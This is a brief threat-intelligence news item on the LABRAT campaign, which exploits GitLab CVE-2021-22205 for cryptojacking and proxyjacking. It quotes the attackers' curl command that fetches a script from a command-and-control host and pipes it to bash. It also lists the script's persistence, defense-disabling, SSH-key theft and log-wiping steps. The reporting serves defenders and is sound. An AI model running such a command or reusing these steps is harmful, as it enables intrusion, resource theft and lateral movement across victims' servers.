A new campaign called LABRAT is targeting GitLab with cryptojacking and proxyjacking.
LABRAT, a financially motivated operation, has been uncovered by the Sysdig Threat Research Team (TRT). Notably, the attackers have prioritized stealth and defense evasion tactics.
The LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit to conceal their crypto-mining activity by hiding files, processes, and CPU usage.
Technical Analysis – GitLab exploitation
The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205. In this vulnerability, GitLab does not properly validate image files passed to a file parser, resulting in a remote command execution. There are many public exploits for this vulnerability, which is still actively exploited.
- Once the attacker had access to the server, they executed the following command to download a malicious script from the C2 server.
curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash - The initial script allowed the attacker to achieve persistence, evade defenses, and perform lateral movement through the following actions:
- Check whether or not the watchdog process was already running to kill it.
- Delete malicious files if they exist from a previous run.
- Disable Tencent Cloud and Alibaba’s defensive measures, a recurring feature of many attackers.
- Download malicious binaries.
- Create a new service with one of these binaries and if root, ran it on the fly.
- Modify various cron files to maintain persistence.
- Gather SSH keys to connect to those machines and start the process again, doing lateral movement.
- Deletes any evidence that the above processes may have generated.
For more details on LABRAT campaign:
https://hackersonlineclub.com/gitlab-exploited-labrat-cryptojacking-and-proxyjacking/
InfoSec tools | InfoSec services | InfoSec books | Follow our blog